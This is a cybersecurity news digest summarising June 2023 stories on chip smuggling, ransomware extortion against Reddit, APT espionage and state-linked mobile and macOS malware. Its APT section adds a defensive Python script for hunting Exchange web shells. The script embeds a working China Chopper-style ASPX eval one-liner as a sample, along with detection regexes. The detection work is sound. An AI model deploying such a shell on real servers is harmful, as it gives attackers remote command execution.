Daily Drop (525): CN's underground market: AI Chips, Reddit: Ransomware posting, APT: Target Middle Eastern and African Governments, Foxconn hedges its bets, US: Automakers to cut ties with CN
06-20-23
Tuesday, Jun 20, 2023 // (IG): BB // Financial Enabler PODCAST // Coffee for Bob
Inside China's underground market for high-end Nvidia AI chips
Analyst Comments: The availability of these Nvidia chips in China's underground market highlights the difficulty of enforcing export controls on high-demand, easily transported products such as high-performance AI accelerators. These chips are central to developing advanced AI systems, which bear on both economic competitiveness and national security. The trade reflects strong demand in China and the country's growing capabilities and ambitions in AI, but it also underscores the limits of unilateral export controls in an interconnected global supply chain: a ban on direct sales does not stop chips from reaching resellers in small volumes at a premium.
FROM THE MEDIA: High-end Nvidia AI chips, whose export to China and Hong Kong was barred by the US administration in September 2022, are available in underground markets in Shenzhen, China. The chips are not advertised but can be procured discreetly from vendors for around $20,000 apiece, double the usual price. Demand for high-end chips has surged globally, especially for Nvidia's GPUs, which are regarded as the best option for machine-learning workloads. Nvidia does not permit exports of the A100 or H100 to China and has developed slower variants, the A800 and H800, to comply with US rules.
READ THE STORY: Reuters
UK's chief hacker to take over National Crime Agency's economic and organized crime directorate
Analyst Comments: James Babbage's move from the NCF to the NCA reflects a shift in focus from cyber operations to economic crime investigation. Babbage's experience leading the NCF and his background in cyber and signals intelligence at GCHQ make him well suited to his new role at the NECC. As director general, Babbage will play a central role in addressing economic crime threats such as money laundering and commodity fraud. The NECC's work aligns with the UK government's efforts to combat economic crime and protect the integrity of the financial system.
FROM THE MEDIA: James Babbage, the head of the UK's National Cyber Force (NCF), is leaving his position to take on a role at the National Crime Agency (NCA) as the director general of the National Economic Crime Centre (NECC) and threat leadership. Babbage's appointment comes after the demotion of Steve Rodhouse, the former director general for operations at the NCA. Babbage had been leading the NCF, consolidating cyber capabilities across UK military and intelligence agencies since its establishment in 2020. The NCF will continue its operations under new leadership. The NECC is responsible for investigating economic crimes, including commodity fraud and money laundering.
READ THE STORY: The Record
China launches new space satellite
Analyst Comments: The successful deployment of the Shiyan-25 satellite underscores China's continued progress in space technology and Earth observation. The use of the Long March-6, a rapid-response launch vehicle, demonstrates China's ability to deliver payloads to specific orbits reliably and efficiently. The longevity and versatility of the Long March series, with this launch marking its 477th mission, speaks to the maturity of China's space program. The operational status of Shiyan-25 also opens new avenues for Earth-observation technology experiments, which could lead to advances in environmental monitoring, weather prediction, and related fields.
FROM THE MEDIA: On June 20, 2023, China successfully launched the Shiyan-25 satellite on a Long March-6 rocket from the Taiyuan Satellite Launch Center. Shiyan-25, now operational in a Sun-synchronous orbit, is slated to conduct experiments on new Earth-observation technologies. This was the 477th flight of China's Long March rocket series. The Long March-6, developed by the Shanghai Academy of Spaceflight Technology under the China Aerospace Science and Technology Corporation, is a small liquid-fueled launch vehicle. It stands 29 meters tall, has a diameter of 3.35 meters and a mass of 103,000 kg, uses three stages with different engines and propellants, and can place at least 1,000 kg of payload into a Sun-synchronous orbit.
READ THE STORY: United News of India
Reddit says ransomware posting connected to the February incident
Analyst Comments: Reddit's acknowledgment that the recent ransomware claims are connected to the February security incident reinforces the seriousness of the situation. The phishing campaign that led to the breach highlights the need for robust cybersecurity controls and employee awareness training. While Reddit stated that no high-risk data was compromised, the incident raises concerns about the exposure of internal documents and contact information. That the group behind the extortion, BlackCat/ALPHV, is associated with DarkSide, the group responsible for the Colonial Pipeline attack, adds to the significance of the threat.
FROM THE MEDIA: Reddit has acknowledged that recent claims made by the BlackCat/ALPHV ransomware group are connected to a security incident the company disclosed in February. The group threatened to release 80GB of stolen data unless it was paid $4.5 million and Reddit reversed its decision to charge third parties for using its API. Reddit stated that the claims relate to the previously disclosed incident, in which a sophisticated phishing campaign allowed attackers to access some internal documents and business information. Reddit clarified that no high-risk data, such as credit card details or account passwords, was compromised.
READ THE STORY: The Record
State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments
Analyst Comments: The CL-STA-0043 cyber-espionage campaign represents a significant threat to government entities in the Middle East and Africa. The campaign demonstrates a high level of sophistication, adaptiveness, and a wide range of capabilities, suggesting the involvement of a nation-state threat actor. The use of never-before-seen and rare techniques highlights the advanced nature of the attacks. Organizations should prioritize securing their on-premises IIS and Exchange servers, implementing strong access controls, regularly patching vulnerabilities, and monitoring for suspicious activities.
FROM THE MEDIA: Government entities in the Middle East and Africa have been targeted by advanced persistent threat (APT) cyber-espionage attacks that exploit new and rare credential theft and Exchange email exfiltration techniques. The attacks are primarily aimed at obtaining highly confidential and sensitive information related to politicians, military activities, and ministries of foreign affairs. The Cortex Threat Research team at Palo Alto Networks has temporarily named the activity CL-STA-0043 and described it as a "true APT." The infection begins with the exploitation of vulnerable on-premises Internet Information Services (IIS) and Microsoft Exchange servers. Failed attempts to execute the China Chopper web shell in one of the attacks led the adversaries to shift tactics and leverage an in-memory Visual Basic Script implant from the Exchange Server.
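A concrete hunt for the first stage described above, written as an added example for this digest rather than code from the Palo Alto Networks report: it parses IIS W3C log lines for POSTs to .aspx files that Exchange does not ship in its front-end directories (where web shells such as China Chopper are typically dropped) and scans page source for China Chopper-style eval-of-request one-liners. The log lines, the allowlist of known-good pages and the shell sample are all constructed; the allowlist must be generated from a clean baseline of your own Exchange build before use.

```python
"""Hunt for web-shell activity on an on-premises Exchange/IIS server.

Added example, not code from the CL-STA-0043 report. Two generic checks:
  1. Flag HTTP POSTs to .aspx files under the Exchange front-end directories
     that are not in an allowlist of files Exchange legitimately serves.
  2. Flag .aspx source that matches China Chopper style one-liners.
"""
import re
from collections import defaultdict

# Directories attackers favour for dropping shells on Exchange (assumption:
# tune to your deployment). Exchange ships only static client scripts under
# /aspnet_client/, so any .aspx there is suspect.
WATCHED_PREFIXES = ("/owa/auth/", "/ecp/", "/aspnet_client/")

# Constructed allowlist of .aspx pages Exchange serves from the watched
# directories. Generate the real list from a known-clean server.
KNOWN_GOOD_ASPX = {
    "/owa/auth/logon.aspx",
    "/owa/auth/logoff.aspx",
    "/owa/auth/errorfe.aspx",
    "/ecp/default.aspx",
}

# Server-side markers of China Chopper style ASPX shells: a one-liner that
# evaluates attacker-supplied request data, or reflective assembly loading.
CHOPPER_PATTERNS = [
    re.compile(r'eval\s*\(\s*Request\.(Item|Form|Params)\s*\[', re.I),
    re.compile(r'System\.Reflection\.Assembly\.Load\s*\(.*Request\.', re.I),
]

# Constructed IIS W3C log excerpt (not real telemetry): a normal OWA logon
# from one client, then a second client POSTing to an .aspx file that does
# not belong in /owa/auth/ (first attempt fails with 500, retry succeeds) and
# to a second dropped file under /aspnet_client/.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-18 09:12:01 10.0.0.5 POST /owa/auth.owa - 443 - 203.0.113.7 Mozilla/5.0 https://mail.example.test/owa/auth/logon.aspx 302 0 0 120
2023-06-18 09:13:44 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 15
2023-06-18 09:14:10 10.0.0.5 POST /ecp/default.aspx - 443 admin 203.0.113.7 Mozilla/5.0 - 200 0 0 33
2023-06-18 09:15:02 10.0.0.5 POST /owa/auth/cache.aspx - 443 - 198.51.100.9 Mozilla/4.0+(compatible;+MSIE+6.0) - 500 0 0 40
2023-06-18 09:15:30 10.0.0.5 POST /owa/auth/cache.aspx - 443 - 198.51.100.9 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 88
2023-06-18 09:20:11 10.0.0.5 POST /aspnet_client/system_web/help.aspx - 443 - 198.51.100.9 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 91
"""

# Constructed page sources: a China Chopper style shell and a benign page.
SAMPLE_SHELL = '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'
SAMPLE_BENIGN = '<%@ Page Language="C#" AutoEventWireup="true" %><html><body>Sign in</body></html>'


def parse_iis_log(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields, entries = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields is None or len(values) != len(fields):
            continue  # malformed or truncated line: skip rather than guess
        entries.append(dict(zip(fields, values)))
    return entries


def suspect_requests(entries):
    """POSTs to non-allowlisted .aspx files under the watched prefixes,
    grouped by (client IP, path) with a request count and the status codes
    seen, so a failed attempt followed by a retry shows up as one finding."""
    hits = defaultdict(lambda: {"count": 0, "statuses": []})
    for e in entries:
        path = e["cs-uri-stem"].lower()
        if e["cs-method"].upper() != "POST" or not path.endswith(".aspx"):
            continue
        if not path.startswith(WATCHED_PREFIXES) or path in KNOWN_GOOD_ASPX:
            continue
        key = (e["c-ip"], path)
        hits[key]["count"] += 1
        hits[key]["statuses"].append(e["sc-status"])
    return dict(hits)


def is_chopper_like(aspx_source):
    """True if the page source matches a China Chopper style ASPX shell."""
    return any(p.search(aspx_source) for p in CHOPPER_PATTERNS)


if __name__ == "__main__":
    for (ip, path), info in suspect_requests(parse_iis_log(SAMPLE_IIS_LOG)).items():
        print(f"SUSPECT {ip} POST {path}: {info['count']} request(s), statuses {info['statuses']}")
    print("shell-like:", is_chopper_like(SAMPLE_SHELL), is_chopper_like(SAMPLE_BENIGN))
```

Run the same two functions over the real IIS logs and over every .aspx under the Exchange front-end directories; a non-allowlisted page that is receiving POSTs and that also matches the source patterns is a strong web-shell indicator, while a page that receives POSTs but cannot be found on disk may already have been cleaned up and deserves a look at file-system audit logs.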
READ THE STORY: THN
Italy ties China’s hands at Pirelli over fears about chip technology
Analyst Comments: Italy's imposition of restrictions on Sinochem underscores the increasing concerns about protecting sensitive technology from Chinese access. By utilizing the "Golden Power" regulations, Italy aims to safeguard the strategic importance of chip technology and prevent the transfer of sensitive information. This move aligns with similar actions taken by other European countries and the United States. It highlights the growing scrutiny and measures being implemented to limit China's access to advanced technology. As geopolitical tensions continue to rise, multinational companies are also considering steps to protect their operations, such as spinning off businesses or creating separate units in response to growing friction.
FROM THE MEDIA: The Italian government has imposed restrictions on Sinochem, the largest shareholder of Pirelli, to prevent the Chinese government's access to sensitive chip technology. Italy invoked its "Golden Power" regulations, aimed at protecting assets of strategic importance to the country. The move follows similar interventions by Germany and the United Kingdom to safeguard semiconductor technology. The order limits Sinochem's involvement in Pirelli, including barring it from devising the company's strategy and financial plans or appointing a CEO. The restrictions aim to protect Pirelli's autonomy and information of strategic importance.
READ THE STORY: KRDO
Foxconn hedges its bets: US and China will make up, but diversify just in case
Analyst Comments: Foxconn's plans for geographic diversification and its pivot toward the EV market show the company adapting to global trends and geopolitical tension. Its partial diversification away from China, while keeping its core Chinese operations, mirrors the broader shift in global supply chains as companies seek to reduce their dependence on a single country. Foxconn's investment in EVs aligns with the global push toward decarbonization and electrification, positioning the company to capitalize on a rapidly growing market.
FROM THE MEDIA: Foxconn's CEO, Young Liu, in an interview with the BBC, stated that he believes the company will continue manufacturing components in China for electronics produced by US firms, despite the tense relationship between the two countries. However, he did express concern over worsening US-China relations. In anticipation of potential geopolitical conflicts, Foxconn has started geographic diversification of its facilities. Some production lines have already been relocated to Mexico and Vietnam. Liu believes that the US and China will eventually reach a balance in their relationship. The interview also touched on the mass exodus of workers from the Zhengzhou iPhone factory in 2022, which Liu described as a "transportation issue". Looking ahead, Foxconn plans to expand into the electric vehicle (EV) market, betting on the increasing use of electronic components in such vehicles.
READ THE STORY: The Register
US Lawmakers to urge automakers to cut reliance on China
Analyst Comments: The planned meeting between a bipartisan group of US lawmakers and the CEOs of Ford and General Motors reflects growing US concern about dependence on China for critical auto parts, particularly EV batteries. The push for less reliance on China aligns with broader efforts to strengthen domestic industry, secure supply chains, and reduce economic dependence on strategic rivals. The outcome could have substantial implications for the US auto industry, particularly for electric vehicles, and may accelerate efforts to build domestic EV battery production.
FROM THE MEDIA: A bipartisan group of US lawmakers from the House of Representatives China Select Committee plans to meet with the CEOs of Ford and General Motors to urge them to reduce reliance on China for auto parts, especially electric vehicle (EV) batteries. The focus on Chinese auto parts follows a visit by the US Secretary of State to Beijing that yielded no significant breakthroughs. The lawmakers also plan to meet executives from auto suppliers including BorgWarner, Continental, Bosch, Tenneco, and battery startup Our Next Energy. Last year, the $430 billion Inflation Reduction Act was signed into law, aiming to reduce US EV production's dependence on Chinese supply chains by attaching new conditions to EV tax credits. Ford's agreement to use technology from Chinese battery company CATL at its $3.5 billion battery plant in Michigan has drawn criticism from lawmakers.
READ THE STORY: Reuters
Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems
Analyst Comments: The discovery of this sophisticated toolkit targeting macOS systems raises concerns about the security of Apple devices. The toolkit's cross-platform capabilities and the presence of backdoors suggest that threat actors are actively developing advanced malware to target macOS users. This underscores the importance of implementing robust security measures, including regular software updates, strong access controls, and comprehensive threat detection and response capabilities.
FROM THE MEDIA: Cybersecurity researchers from Bitdefender have uncovered a sophisticated toolkit targeting Apple macOS systems. The toolkit consists of four malicious samples, two of which are Python-based backdoors called JokerSpy, capable of targeting Windows, Linux, and macOS. These backdoors establish contact with remote servers to fetch instructions and can execute various actions, such as gathering system information, running commands, downloading files, and exfiltrating data. The researchers also identified a more potent backdoor labeled "sh.py," which possesses extensive capabilities for system metadata gathering, file enumeration, command execution, and data exfiltration. Additionally, they discovered a Swift-based FAT binary called xcc, designed to check permissions and potentially interact with spyware components.
READ THE STORY: THN
Rogue Android Apps Target Pakistani Individuals in Sophisticated Espionage Campaign
Analyst Comments: This cyber campaign underscores the escalating threat posed by rogue apps and highlights the challenges faced by app store platforms in vetting and securing their ecosystems. It also raises concerns about the growing use of such techniques by state-backed actors, suggesting a trend toward the use of cyber operations in geopolitical conflicts. Furthermore, this development stresses the importance of individual users scrutinizing and verifying apps before downloading them, even when they are available in official app stores.
FROM THE MEDIA: Cybersecurity firm Cyfirma has reported a new targeted cyber campaign in Pakistan that uses two rogue Android apps available on Google Play Store to gather information from unsuspecting users. The firm attributes the campaign to a threat actor known as the DoNot Team, also known as APT-C-35 and Viceroy Tiger, which is believed to have ties to India. The malicious activity involves duping Android smartphone users into downloading a program that extracts contact and location data. The rogue apps, originating from a developer named "SecurITY Industry," pose as VPN and chat apps. The cyberattacks are highly targeted, a typical feature of nation-state actors, and make use of the implicit trust users place in the Google Play Store, underlining the importance of careful app vetting prior to download.
READ THE STORY: THN